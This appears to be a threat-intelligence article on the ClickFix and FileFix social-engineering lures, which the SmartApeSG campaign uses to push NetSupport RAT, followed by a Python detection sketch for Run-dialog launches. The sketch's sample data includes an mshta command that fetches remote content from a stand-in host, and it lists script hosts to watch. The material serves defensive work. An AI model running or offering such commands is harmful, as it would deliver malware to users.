ClickFix and FileFix Social Engineering Techniques for Malware Delivery
Cybercriminals are leveraging social engineering techniques known as ClickFix and its new variant, FileFix, to trick users into executing malicious commands on their Windows systems. The ClickFix method involves compromised websites displaying fake CAPTCHA-style pages that prompt users to "verify you are human." When users interact with these pages, malicious content is injected into their clipboard, and they are instructed to paste and run this content via the Windows Run dialog, leading to the installation of remote access tools such as NetSupport RAT. The SmartApeSG campaign is one example actively using this approach, with infection chains triggered under specific conditions on compromised sites.
The FileFix variation, recently observed in the wild, shifts the attack vector by instructing users to paste malicious commands into the Windows File Explorer address bar instead of the Run dialog. This subtle change exploits user familiarity with File Explorer, making the attack less suspicious and increasing the likelihood of success. Both techniques rely on phishing emails or fake service pages to lure victims, and the end goal is typically the deployment of remote access malware. Security teams should be aware of these evolving tactics and educate users about the risks of following unsolicited instructions involving system dialogs or file paths.

How this story unfolded
5 events from the most recent confirmed update back to the earliest known activity.
SmartApeSG adopts new password-protected ZIP delivery scheme
On 2026-04-06, SmartApeSG activity was documented using injected scripts on a compromised website to send users to a fake CAPTCHA ClickFix page, with malware delivered in password-protected ZIP archives. The report noted a new password scheme in which the archive password was posted on the malicious site's About page, and indicated the malware could persist on infected Windows hosts.
SANS ISC details SmartApeSG ClickFix-to-NetSupport RAT infection chain
SANS ISC published a lab analysis of a SmartApeSG campaign in which compromised sites use hidden injected scripts to redirect victims to fake CAPTCHA pages that ultimately install NetSupport RAT. The report included technical details such as delivery URLs, a SHA-256 hash for the ZIP payload, persistence via a Start Menu shortcut and .js file, and observed C2 traffic over TCP/443.
SmartApeSG shifts to ClickFix-style fake CAPTCHA delivery
By late 2025, SmartApeSG was observed using ClickFix-style fake CAPTCHA pages instead of earlier fake update lures. The pages trick users into pasting a clipboard-injected mshta command into the Windows Run dialog, leading to NetSupport RAT delivery.
Researchers publish FileFix as a new ClickFix variation
Kaspersky published research describing FileFix as a new variation of the ClickFix social-engineering technique targeting Windows File Explorer users. The publication marked public disclosure of this new ClickFix variant.
SmartApeSG activity documented since at least June 2024
The SmartApeSG threat cluster, also tracked as ZPHP or HANEYMANEY, has been reported since at least June 2024. Earlier activity used social-engineering lures such as fake browser updates to infect victims.
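
A detection sketch for the Run-dialog path in the timeline above, where a clipboard-injected mshta command is pasted into the Windows Run dialog. This is an added example, not code from the cited reports. It assumes process-creation events with Sysmon Event ID 1 field names and Run-dialog history strings exported from the user's RunMRU registry key; all host names, users, paths and `.example` URLs are constructed.

```python
import re

# mshta is the host named on this page; the other entries are assumptions added for coverage.
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe"}
URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

def basename(path):
    """Lower-cased file name of a Windows path; a bare typed name gets '.exe' appended."""
    name = path.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    return name if name.endswith(".exe") else name + ".exe"

def first_token(command):
    """Program part of a typed command, honouring a leading quoted path."""
    command = command.strip()
    if command.startswith('"'):
        return command[1:].split('"', 1)[0]
    return command.split(None, 1)[0] if command else ""

def fetches_remote(image, command_line):
    """True when a script host is asked to load content from an http(s) URL."""
    return basename(image) in SCRIPT_HOSTS and bool(URL_RE.search(command_line))

def triage_process_events(events):
    """Flag script hosts with a URL argument whose parent is explorer.exe (Run-dialog launches)."""
    return [
        {"computer": ev["Computer"], "user": ev["User"], "urls": URL_RE.findall(ev["CommandLine"])}
        for ev in events
        if basename(ev["ParentImage"]) == "explorer.exe"
        and fetches_remote(ev["Image"], ev["CommandLine"])
    ]

def triage_runmru(values):
    """Check Run-dialog history strings; RunMRU data carries a trailing '\\1' marker."""
    typed = [v.removesuffix("\\1") for v in values]
    return [v for v in typed if fetches_remote(first_token(v), v)]

# Constructed sample data: one Run-dialog lure, one benign launch, one non-Explorer parent.
SAMPLE_EVENTS = [
    {"Computer": "WS-014", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta https://lure.example/verify"},
    {"Computer": "WS-014", "User": "CORP\\alice", "ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe C:\\notes.txt"},
    {"Computer": "WS-022", "User": "CORP\\bob", "ParentImage": "C:\\Tools\\launcher.exe",
     "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta http://intranet.example/app.hta"},
]
SAMPLE_RUNMRU = ["mshta https://lure.example/verify\\1", "cmd\\1", "\\\\fileserver\\share\\1"]

if __name__ == "__main__":
    print(triage_process_events(SAMPLE_EVENTS), triage_runmru(SAMPLE_RUNMRU))
```

The parent filter is deliberately narrow: it isolates launches that came from the Explorer shell, so the third sample event is left for other rules to judge.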
Sources
3 references tracked.
Malware-Traffic-Analysis.net - 2026-04-06: SmartApeSG activity (malware-traffic-analysis.net)
SmartApeSG campaign uses ClickFix page to push NetSupport RAT (isc.sans.edu)
FileFix: a new ClickFix variation (kaspersky.com)


